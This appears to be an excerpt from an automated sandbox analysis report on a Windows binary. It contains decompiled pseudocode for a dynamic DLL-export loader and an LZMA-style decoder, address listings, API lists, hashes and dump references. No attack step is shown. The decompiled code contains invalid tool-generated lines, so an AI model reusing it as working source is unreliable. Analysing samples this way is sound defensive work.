								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323);
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E733515C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E733512FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E733515C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323);
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E733512FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E733512FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E733512FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E73351224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E733512FE(_t90) * 4);
					goto L165;
				}
			}

0x73351aa0
0x73351aa3
0x73351aa6
0x73351aa9
0x73351aac
0x73351aaf
0x73351ab2
0x73351ab4
0x73351ab7
0x73351aba
0x73351abf
0x73351ac2
0x73351aca
0x73351ad2
0x73351ad4
0x73351ad7
0x73351adf
0x73351adf
0x73351ae4
0x73351ae7
0x00000000
0x00000000
0x73351af1
0x73351af3
0x73351af8
0x73351afa
0x73351b8b
0x73351b8b
0x73351b8b
0x73351b8f
0x73351b92
0x73351b94
0x73351bb6
0x73351bb9
0x73351bbb
0x73351bc4
0x73351bca
0x73351bcc
0x73351bd2
0x73351bd2
0x73351bd8
0x73351bdb
0x73351bdb
0x73351bde
0x73351bde
0x73351be4
0x73351be6
0x73351be9
0x73351bef
0x73351bf2
0x73351bf2
0x73351bf4
0x73351bfa
0x73351bfd
0x73351c21
0x73351c24
0x00000000
0x00000000
0x73351c27
0x73351c29
0x73351c37
0x73351c3a
0x73351c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x73351c3e
0x73351c3e
0x73351c3e
0x73351c44
0x73351c46
0x00000000
0x00000000
0x73351c48
0x73351c4a
0x73351c4c
0x73351c4e
0x00000000
0x00000000
0x00000000
0x73351c4e
0x73351c50
0x73351c52
0x73351c54
0x73351c54
0x73351c5a
0x73351c60
0x73351c62
0x73351c76
0x73351c76
0x73351c78
0x73351c64
0x73351c6a
0x73351c6d
0x73351c6d
0x00000000
0x73351bff
0x73351bff
0x73351bff
0x73351c00
0x73351c08
0x73351c0c
0x73351c12
0x73351c16
0x00000000
0x73351c16
0x73351c02
0x73351c02
0x73351c03
0x00000000
0x00000000
0x73351c05
0x73351c06
0x00000000
0x00000000
0x00000000
0x73351c06
0x73351b96
0x73351b97
0x73351ba0
0x73351ba3
0x73351bb0
0x73351bb0
0x73351ba5
0x73351ba5
0x73351c7e
0x73351c81
0x73351c84
0x73351cf6
0x73351cfa
0x73351adc
0x00000000
0x73351adc
0x00000000
0x73351cfa
0x73351b94
0x73351b00
0x73351b03
0x73351b66
0x73351b69
0x73351b7a
0x73351b7a
0x73351b7d
0x73351c89
0x73351c8c
0x73351c8c
0x73351c8e
0x73352033
0x73352045
0x73352045
0x73352047
0x00000000
0x00000000
0x73352037
0x73352038
0x7335203b
0x7335203e
0x733520ba
0x733520c1
0x733520c6
0x733520c9
0x73351cf2
0x73351cf2
0x73351cf2
0x73351cf3
0x00000000
0x73351cf3
0x73352040
0x73352042
0x73352042
0x73352049
0x7335204b
0x733520ae
0x73351ce7
0x73351cea
0x73351ced
0x73351cf0
0x73351cf0
0x00000000
0x73351cf0
0x7335204d
0x7335204f
0x73352055
0x73352055
0x73352057
0x7335205a
0x7335206d
0x7335206d
0x73352070
0x73352073
0x00000000
0x00000000
0x73352075
0x73352078
0x00000000
0x00000000
0x7335207a
0x73352081
0x73352081
0x73352087
0x7335208a
0x733520a6
0x7335208c
0x73352095
0x73352098
0x73352098
0x00000000
0x7335208a
0x7335205c
0x7335205f
0x73352062
0x00000000
0x00000000
0x73352064
0x00000000
0x73352064
0x73352051
0x73352053
0x00000000
0x00000000
0x00000000
0x73352053
0x73351c94
0x73351c94
0x73351c95
0x73351dde
0x73351dde
0x73351de5
0x73351de8
0x00000000
0x00000000
0x73351df5
0x00000000
0x73351fdb
0x73351fde
0x73351fe1
0x73351fe1
0x73351fe2
0x73351fe5
0x73351fe7
0x73351fe9
0x00000000
0x00000000
0x73351feb
0x73351feb
0x73351fee
0x73352000
0x73352003
0x73352006
0x7335200c
0x00000000
0x7335200c
0x73351ff0
0x73351ff0
0x73351ff2
0x00000000
0x00000000
0x73351ff4
0x73351ff6
0x73351ff8
0x73351ff8
0x73351ff8
0x73351ff9
0x73351ffb
0x73351ffd
0x73351fe1
0x73351fe2
0x73351fe5
0x73351fe7
0x73351fe9
0x00000000
0x00000000
0x00000000
0x73351fe9
0x00000000
0x73351e3c
0x00000000
0x00000000
0x73351e48
0x00000000
0x00000000
0x73351e2f
0x73351e33
0x73351e37
0x00000000
0x00000000
0x73351fad
0x73351fb1
0x00000000
0x00000000
0x73351fb7
0x73351fbf
0x73351fc6
0x73351fce
0x00000000
0x00000000
0x73351f15
0x73351f15
0x00000000
0x00000000
0x73351e51
0x00000000
0x00000000
0x7335202b
0x00000000
0x00000000
0x73351f1d
0x73351f1f
0x73351f1f
0x00000000
0x00000000
0x7335201b
0x00000000
0x00000000
0x7335201f
0x00000000
0x00000000
0x73352027
0x00000000
0x00000000
0x73351f64
0x73351f66
0x73351f66
0x00000000
0x00000000
0x73351f2f
0x73351f31
0x73351f31
0x00000000
0x00000000
0x73351f41
0x73351f43
0x73351f43
0x00000000
0x00000000
0x73351f72
0x73351f74
0x73351f74
0x00000000
0x00000000
0x73351f4c
0x73351f4e
0x73351f4e
0x00000000
0x00000000
0x73351f53
0x00000000
0x00000000
0x73352023
0x7335202d
0x7335202d
0x00000000
0x00000000
0x73351f7d
0x73351f81
0x73351f86
0x73351f89
0x73351f8a
0x73351f8d
0x73351f93
0x73351f93
0x00000000
0x00000000
0x73352013
0x00000000
0x00000000
0x73351f57
0x73351f57
0x00000000
0x00000000
0x73351e58
0x73351e58
0x00000000
0x00000000
0x73351f6b
0x73351f6d
0x73351f6d
0x00000000
0x00000000
0x73351dfc
0x73351e02
0x73351e05
0x73351e07
0x73351e07
0x73351e0a
0x73351e0e
0x73351e1b
0x73351e1d
0x73351e23
0x73351e23
0x73351e23
0x00000000
0x00000000
0x73351f20
0x73351f20
0x73351f22
0x73351f29
0x00000000
0x00000000
0x73351f67
0x73351f67
0x00000000
0x00000000
0x73351f32
0x73351f32
0x73351f34
0x73351f3b
0x00000000
0x00000000
0x73351f44
0x73351f44
0x73351f46
0x00000000
0x00000000
0x73351f75
0x73351f75
0x00000000
0x00000000
0x73351f4f
0x73351f4f
0x00000000
0x00000000
0x73351f9b
0x73351f9f
0x73351fa4
0x73351fa7
0x00000000
0x00000000
0x73351f59
0x73351f59
0x73351f5c
0x73351f5e
0x00000000
0x00000000
0x73351f6e
0x73351f6e
0x73351f77
0x73351f77
0x73351e5a
0x73351e5a
0x73351e5d
0x73351e64
0x73351e66
0x73351e68
0x73351e6f
0x73351e72
0x73351e77
0x73351e79
0x73351e7b
0x73351e7f
0x73351e85
0x73351e8b
0x73351e8b
0x73351e8d
0x73351e8d
0x73351e8e
0x73351e8e
0x73351e92
0x73351e98
0x73351e9a
0x73351e9e
0x73351ea3
0x73351ea3
0x73351ea5
0x73351ea5
0x73351ea8
0x73351eab
0x73351eb4
0x73351eb7
0x73351eba
0x73351eba
0x73351ebc
0x73351ebf
0x73351ec5
0x73351ecb
0x73351ecb
0x73351ecd
0x00000000
0x00000000
0x73351ed3
0x73351ed3
0x73351ed7
0x73351ede
0x73351f02
0x73351f02
0x73351f06
0x73351f08
0x73351f0b
0x73351f0b
0x73351f0e
0x73351f0e
0x00000000
0x73351f06
0x73351ee3
0x73351ee6
0x73351ee6
0x73351eed
0x73351eef
0x73351ef2
0x73351ef9
0x73351efa
0x73351f00
0x73351f00
0x00000000
0x73351f00
0x73351ef4
0x73351ef7
0x00000000
0x00000000
0x00000000
0x73351ef7
0x73351e87
0x73351e89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73351df5
0x73351c9b
0x73351c9b
0x73351c9c
0x73351ddb
0x00000000
0x73351ddb
0x73351ca2
0x73351ca3
0x00000000
0x00000000
0x73351ca9
0x73351cac
0x73351da0
0x73351da0
0x73351da3
0x73351db8
0x73351dba
0x73351dba
0x73351dbb
0x73351dbe
0x73351dc1
0x73351dcd
0x73351dcd
0x73351dcd
0x73351dc3
0x73351dc3
0x73351dc3
0x73351dd3
0x00000000
0x73351dd3
0x73351da5
0x73351da5
0x73351da6
0x73351db4
0x00000000
0x73351db4
0x73351da9
0x73351daa
0x00000000
0x00000000
0x73351db0
0x00000000
0x73351db0
0x73351cb2
0x73351d9c
0x00000000
0x73351d9c
0x73351cb8
0x73351cb8
0x73351cbb
0x73351ce4
0x00000000
0x73351ce4
0x73351cbd
0x73351cbd
0x73351cc0
0x73351cda
0x00000000
0x73351cda
0x73351cc2
0x73351cc2
0x73351cc5
0x73351cd4
0x00000000
0x73351cd4
0x73351cc8
0x73351cc9
0x00000000
0x00000000
0x73351ccb
0x00000000
0x73351b83
0x73351b83
0x73351b86
0x00000000
0x73351b86
0x73351b7d
0x73351b6b
0x73351b6f
0x00000000
0x00000000
0x73351b71
0x73351b74
0x00000000
0x00000000
0x00000000
0x73351b74
0x73351b05
0x73351b08
0x73351b3e
0x73351b41
0x00000000
0x73351b47
0x73351b49
0x73351b4d
0x73351b54
0x73351b5b
0x73351b5e
0x73351b61
0x00000000
0x73351b61
0x73351b41
0x73351b0a
0x73351b0b
0x73351b26
0x73351b29
0x00000000
0x73351b2f
0x73351b2f
0x73351b36
0x73351b39
0x00000000
0x73351b39
0x73351b29
0x73351b10
0x00000000
0x73351b16
0x73351b16
0x73351b1d
0x00000000
0x73351b1d
0x73351b10
0x73351d09
0x73351d0e
0x73351d13
0x73351d17
0x733521c6
0x733521cc
0x73351d29
0x73351d2b
0x73351d2c
0x733520f1
0x733520f1
0x733520f4
0x733520f7
0x73352114
0x7335211a
0x7335211c
0x73352122
0x73352139
0x73352139
0x73352139
0x73352146
0x7335214c
0x7335214f
0x73352155
0x73352157
0x7335215a
0x7335215c
0x73352163
0x73352168
0x7335216b
0x7335216d
0x73352172
0x73352184
0x73352184
0x73352172
0x7335216b
0x7335215a
0x7335218a
0x7335218d
0x73352197
0x7335219f
0x733521ab
0x733521b1
0x733521b4
0x733520e6
0x733520e6
0x00000000
0x733520e6
0x733521ba
0x733521c0
0x733521c0
0x00000000
0x00000000
0x733521c2
0x733521c2
0x733521c2
0x733521c2
0x00000000
0x7335218f
0x7335218f
0x73352195
0x00000000
0x00000000
0x00000000
0x73352195
0x7335218d
0x73352125
0x7335212b
0x7335212d
0x73352133
0x00000000
0x00000000
0x00000000
0x73352133
0x733520f9
0x73352100
0x73352106
0x7335210c
0x00000000
0x7335210c
0x73351d32
0x73351d33
0x733520d0
0x733520d0
0x733520d6
0x733520d9
0x00000000
0x00000000
0x733520e0
0x733520e5
0x00000000
0x733520e5
0x73351d3a
0x00000000
0x00000000
0x73351d40
0x73351d40
0x73351d49
0x73351d4e
0x73351d54
0x00000000
0x00000000
0x73351d5a
0x73351d67
0x73351d6d
0x73351d77
0x73351d7d
0x73351d85
0x73351d95
0x00000000
0x73351d95

APIs

Part of subcall function 73351215: GlobalAlloc.KERNELBASE(00000040,73351233,?,733512CF,-7335404B,733511AB,-000000A0), ref: 7335121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73351BC4
lstrcpyA.KERNEL32(00000008,?), ref: 73351C0C
lstrcpyA.KERNEL32(00000408,?), ref: 73351C16
GlobalFree.KERNEL32 ref: 73351C29
GlobalFree.KERNEL32 ref: 73351D09
GlobalFree.KERNEL32 ref: 73351D0E
GlobalFree.KERNEL32 ref: 73351D13
GlobalFree.KERNEL32 ref: 73351EFA
lstrcpyA.KERNEL32(?,?), ref: 73352098
GetModuleHandleA.KERNEL32(00000008), ref: 73352114
LoadLibraryA.KERNEL32(00000008), ref: 73352125
GetProcAddress.KERNEL32(?,?), ref: 7335217E
lstrlenA.KERNEL32(00000408), ref: 73352198

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 37a8660ae61617b1fdc674c99d44423e2ef0faf7b75e9a5dcff6917590220078
Instruction ID: 56f2f93f515f1b4114771f1fcceab50dde497fd3d80f66ce41fab04e1bece2fe
Opcode Fuzzy Hash: 37a8660ae61617b1fdc674c99d44423e2ef0faf7b75e9a5dcff6917590220078
Instruction Fuzzy Hash: 60226A72D0424A9BDF329FB4C881FAEBBF9BB05315F14462EE196E3280D7795681CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
